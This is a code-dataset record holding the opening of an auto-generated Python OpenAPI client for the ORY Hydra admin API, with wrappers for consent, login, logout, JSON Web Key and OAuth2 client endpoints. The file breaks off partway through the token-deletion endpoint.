hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9aa78cda69a1582791b4e99628cc066f8c0d4542
| 147,670
|
py
|
Python
|
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
"""
ORY Hydra
Welcome to the ORY Hydra HTTP API documentation. You will find documentation for all HTTP APIs here. # noqa: E501
The version of the OpenAPI document: v1.9.1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_hydra_client.api_client import ApiClient, Endpoint
from ory_hydra_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ory_hydra_client.model.accept_consent_request import AcceptConsentRequest
from ory_hydra_client.model.accept_login_request import AcceptLoginRequest
from ory_hydra_client.model.completed_request import CompletedRequest
from ory_hydra_client.model.consent_request import ConsentRequest
from ory_hydra_client.model.flush_inactive_o_auth2_tokens_request import FlushInactiveOAuth2TokensRequest
from ory_hydra_client.model.generic_error import GenericError
from ory_hydra_client.model.health_status import HealthStatus
from ory_hydra_client.model.json_web_key import JSONWebKey
from ory_hydra_client.model.json_web_key_set import JSONWebKeySet
from ory_hydra_client.model.json_web_key_set_generator_request import JsonWebKeySetGeneratorRequest
from ory_hydra_client.model.login_request import LoginRequest
from ory_hydra_client.model.logout_request import LogoutRequest
from ory_hydra_client.model.o_auth2_client import OAuth2Client
from ory_hydra_client.model.o_auth2_token_introspection import OAuth2TokenIntrospection
from ory_hydra_client.model.previous_consent_session import PreviousConsentSession
from ory_hydra_client.model.reject_request import RejectRequest
from ory_hydra_client.model.version import Version
class AdminApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __accept_consent_request(
self,
consent_challenge,
**kwargs
):
"""Accept a Consent Request # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider to authenticate the subject and then tell ORY Hydra now about it. If the subject authenticated, he/she must now be asked if the OAuth 2.0 Client which initiated the flow should be allowed to access the resources on the subject's behalf. The consent provider which handles this request and is a web app implemented and hosted by you. It shows a subject interface which asks the subject to grant or deny the client access to the requested scope (\"Application my-dropbox-app wants write access to all your private files\"). The consent challenge is appended to the consent provider's URL to which the subject's user-agent (browser) is redirected to. The consent provider uses that challenge to fetch information on the OAuth2 request and then tells ORY Hydra if the subject accepted or rejected the request. This endpoint tells ORY Hydra that the subject has authorized the OAuth 2.0 client to access resources on his/her behalf. The consent provider includes additional information, such as session data for access and ID tokens, and if the consent request should be used as basis for future requests. The response contains a redirect URL which the consent provider should redirect the user-agent to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.accept_consent_request(consent_challenge, async_req=True)
>>> result = thread.get()
Args:
consent_challenge (str):
Keyword Args:
body (AcceptConsentRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CompletedRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['consent_challenge'] = \
consent_challenge
return self.call_with_http_info(**kwargs)
self.accept_consent_request = Endpoint(
settings={
'response_type': (CompletedRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/consent/accept',
'operation_id': 'accept_consent_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'consent_challenge',
'body',
],
'required': [
'consent_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'consent_challenge':
(str,),
'body':
(AcceptConsentRequest,),
},
'attribute_map': {
'consent_challenge': 'consent_challenge',
},
'location_map': {
'consent_challenge': 'query',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__accept_consent_request
)
def __accept_login_request(
self,
login_challenge,
**kwargs
):
"""Accept a Login Request # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider (sometimes called \"identity provider\") to authenticate the subject and then tell ORY Hydra now about it. The login provider is an web-app you write and host, and it must be able to authenticate (\"show the subject a login screen\") a subject (in OAuth2 the proper name for subject is \"resource owner\"). The authentication challenge is appended to the login provider URL to which the subject's user-agent (browser) is redirected to. The login provider uses that challenge to fetch information on the OAuth2 request and then accept or reject the requested authentication process. This endpoint tells ORY Hydra that the subject has successfully authenticated and includes additional information such as the subject's ID and if ORY Hydra should remember the subject's subject agent for future authentication attempts by setting a cookie. The response contains a redirect URL which the login provider should redirect the user-agent to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.accept_login_request(login_challenge, async_req=True)
>>> result = thread.get()
Args:
login_challenge (str):
Keyword Args:
body (AcceptLoginRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CompletedRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['login_challenge'] = \
login_challenge
return self.call_with_http_info(**kwargs)
self.accept_login_request = Endpoint(
settings={
'response_type': (CompletedRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/login/accept',
'operation_id': 'accept_login_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'login_challenge',
'body',
],
'required': [
'login_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'login_challenge':
(str,),
'body':
(AcceptLoginRequest,),
},
'attribute_map': {
'login_challenge': 'login_challenge',
},
'location_map': {
'login_challenge': 'query',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__accept_login_request
)
def __accept_logout_request(
self,
logout_challenge,
**kwargs
):
"""Accept a Logout Request # noqa: E501
When a user or an application requests ORY Hydra to log out a user, this endpoint is used to confirm that logout request. No body is required. The response contains a redirect URL which the consent provider should redirect the user-agent to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.accept_logout_request(logout_challenge, async_req=True)
>>> result = thread.get()
Args:
logout_challenge (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CompletedRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['logout_challenge'] = \
logout_challenge
return self.call_with_http_info(**kwargs)
self.accept_logout_request = Endpoint(
settings={
'response_type': (CompletedRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/logout/accept',
'operation_id': 'accept_logout_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'logout_challenge',
],
'required': [
'logout_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'logout_challenge':
(str,),
},
'attribute_map': {
'logout_challenge': 'logout_challenge',
},
'location_map': {
'logout_challenge': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__accept_logout_request
)
def __create_json_web_key_set(
self,
set,
**kwargs
):
"""Generate a New JSON Web Key # noqa: E501
This endpoint is capable of generating JSON Web Key Sets for you. There a different strategies available, such as symmetric cryptographic keys (HS256, HS512) and asymetric cryptographic keys (RS256, ECDSA). If the specified JSON Web Key Set does not exist, it will be created. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_json_web_key_set(set, async_req=True)
>>> result = thread.get()
Args:
set (str): The set
Keyword Args:
body (JsonWebKeySetGeneratorRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKeySet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.create_json_web_key_set = Endpoint(
settings={
'response_type': (JSONWebKeySet,),
'auth': [],
'endpoint_path': '/keys/{set}',
'operation_id': 'create_json_web_key_set',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'set',
'body',
],
'required': [
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'set':
(str,),
'body':
(JsonWebKeySetGeneratorRequest,),
},
'attribute_map': {
'set': 'set',
},
'location_map': {
'set': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_json_web_key_set
)
def __create_o_auth2_client(
self,
body,
**kwargs
):
"""Create an OAuth 2.0 Client # noqa: E501
Create a new OAuth 2.0 client If you pass `client_secret` the secret will be used, otherwise a random secret will be generated. The secret will be returned in the response and you will not be able to retrieve it later on. Write the secret down and keep it somwhere safe. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_o_auth2_client(body, async_req=True)
>>> result = thread.get()
Args:
body (OAuth2Client):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OAuth2Client
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.create_o_auth2_client = Endpoint(
settings={
'response_type': (OAuth2Client,),
'auth': [],
'endpoint_path': '/clients',
'operation_id': 'create_o_auth2_client',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
],
'required': [
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(OAuth2Client,),
},
'attribute_map': {
},
'location_map': {
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_o_auth2_client
)
def __delete_json_web_key(
self,
kid,
set,
**kwargs
):
"""Delete a JSON Web Key # noqa: E501
Use this endpoint to delete a single JSON Web Key. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_json_web_key(kid, set, async_req=True)
>>> result = thread.get()
Args:
kid (str): The kid of the desired key
set (str): The set
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['kid'] = \
kid
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.delete_json_web_key = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/keys/{set}/{kid}',
'operation_id': 'delete_json_web_key',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'kid',
'set',
],
'required': [
'kid',
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'kid':
(str,),
'set':
(str,),
},
'attribute_map': {
'kid': 'kid',
'set': 'set',
},
'location_map': {
'kid': 'path',
'set': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_json_web_key
)
def __delete_json_web_key_set(
self,
set,
**kwargs
):
"""Delete a JSON Web Key Set # noqa: E501
Use this endpoint to delete a complete JSON Web Key Set and all the keys in that set. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_json_web_key_set(set, async_req=True)
>>> result = thread.get()
Args:
set (str): The set
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.delete_json_web_key_set = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/keys/{set}',
'operation_id': 'delete_json_web_key_set',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'set',
],
'required': [
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'set':
(str,),
},
'attribute_map': {
'set': 'set',
},
'location_map': {
'set': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_json_web_key_set
)
def __delete_o_auth2_client(
self,
id,
**kwargs
):
"""Deletes an OAuth 2.0 Client # noqa: E501
Delete an existing OAuth 2.0 Client by its ID. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_o_auth2_client(id, async_req=True)
>>> result = thread.get()
Args:
id (str): The id of the OAuth 2.0 Client.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.delete_o_auth2_client = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/clients/{id}',
'operation_id': 'delete_o_auth2_client',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_o_auth2_client
)
def __delete_o_auth2_token(
self,
client_id,
**kwargs
):
"""Delete OAuth2 Access Tokens from a Client # noqa: E501
This endpoint deletes OAuth2 access tokens issued for a client from the database # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_o_auth2_token(client_id, async_req=True)
>>> result = thread.get()
Args:
client_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['client_id'] = \
client_id
return self.call_with_http_info(**kwargs)
self.delete_o_auth2_token = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/oauth2/tokens',
'operation_id': 'delete_o_auth2_token',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'client_id',
],
'required': [
'client_id',
],
'nullable': [
],
'enum': [
],
